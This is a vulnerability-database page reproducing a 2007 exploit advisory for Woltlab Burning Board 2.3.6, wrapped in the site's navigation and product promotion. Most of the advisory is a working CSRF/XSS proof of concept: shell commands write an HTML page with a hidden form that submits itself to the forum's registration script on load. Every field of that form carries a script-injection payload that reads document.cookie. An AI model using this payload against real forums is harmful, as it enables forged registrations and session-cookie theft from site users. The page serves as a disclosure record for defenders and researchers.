Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

woltlab236-xss.txt

🗓️ 06 Mar 2007 00:00:00Reported by SamenspenderType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

Woltlab Burning Board CSRF/XSS Exploi

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
+--------------------------------------- - -- -  
| SaMuschie Research Labs proudly presents . . .  
+------------------------------------------- -- - -   
| Application: Woltlab Burning Board (wbb)  
| Version: 2.3.6 (others not testet)  
| Vuln./Exploit Type: CSRF/XSS  
| Status: 0day  
+----------------------------------------- -- - -   
| Discovered by: Samenspender  
| Released: 20070302  
| SaMuschie Release Number: 5  
+------------------------------- - -- -  
  
CSRF/XSS Exploit:  
  
cat <<EOF > wetpussy.html  
<form name='evilform' method='POST' action='http://victimhost/wbb2/register.php'>  
<input type=hidden name=r_username value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_email value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_password value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_confirmpassword value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=key_string value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=key_number value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_homepage value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_icq value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_aim value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_yim value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_msn value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_day value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_month value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_year value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_gender value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_signature value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=disablesmilies value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=disablebbcode value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=disableimages value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usertext value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=field%5B1%5D value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=field%5B2%5D value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=field%5B3%5D value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_invisible value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usecookies value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_admincanemail value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showemail value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usercanemail value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_emailnotify value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_notificationperpm value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_receivepm value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_emailonpm value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_pmpopup value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showsignatures value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showavatars value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showimages value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_daysprune value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_umaxposts value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_threadview value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_dateformat value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_timeformat value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_startweek value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_timezoneoffset value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usewysiwyg value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_styleid value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_langid value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=send value='send'>  
<input type=hidden name=sid value=''>  
<input type=hidden name=disclaimer value='viewed'>  
</form>  
<body onload=javascript:document.forms['evilform'].submit();>  
EOF  
  
+----------------------------- -- -  
| Lameness Disclaimer  
+------------------------------------- - -- - -   
| SaMuschie Research Labs was founded to publish  
| vulnerabilities within well known software products,  
| which are easy to discover and exploit.  
|   
| SaMuschie researchers just spend a minimum of time  
| and knowledge for each vulnerability. Hence readers of  
| this advisory are requested not to ask any questions  
| to the researchers.... they don't know the answer ;)  
+---------------------------------- - -- - -  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (GNU/Linux)  
  
iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD  
Qg6at+bMTnvHbw0SYyXk5ko=  
=7wPg  
-----END PGP SIGNATURE-----  
  
  
  
  
  
  
___________________________________________________________   
Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
woltlab burning boardcsrfxssexploitdiscovered by samenspenderreleased 20070302samuschie release number: 5
39